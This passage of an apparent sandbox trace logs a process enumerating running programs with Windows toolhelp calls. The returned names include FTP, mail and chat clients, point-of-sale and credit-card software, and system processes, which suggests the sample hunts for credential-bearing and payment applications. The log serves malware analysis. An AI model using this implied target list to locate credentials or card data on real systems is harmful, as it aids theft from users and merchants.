cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0235.541] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0235.594] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0235.595] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0235.597] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0235.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0235.599] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0235.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0235.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0235.603] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0235.605] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.609] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.610] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.612] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.613] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.614] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.616] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.617] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.619] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.623] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.624] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0235.626] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0235.628] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0235.629] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0235.631] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0235.633] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0235.634] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0235.666] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0235.674] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0235.676] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0235.677] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0235.679] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0235.681] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0235.682] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0235.684] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0235.685] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0235.687] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.690] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.691] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.693] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.695] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.697] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.699] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.701] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.703] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.705] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.706] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.708] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.709] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.711] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.712] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.729] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.731] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0235.732] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0235.734] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0235.735] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0235.736] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0235.738] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.740] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.742] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0235.743] CloseHandle (hObject=0x1b08) returned 1 [0235.743] Sleep (dwMilliseconds=0x64) [0235.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0235.883] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.884] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.886] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.890] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.891] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.892] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.894] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.895] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.896] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.898] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.900] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.901] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.905] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.907] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.908] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.910] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.911] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.912] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.914] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.915] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.953] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.955] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, 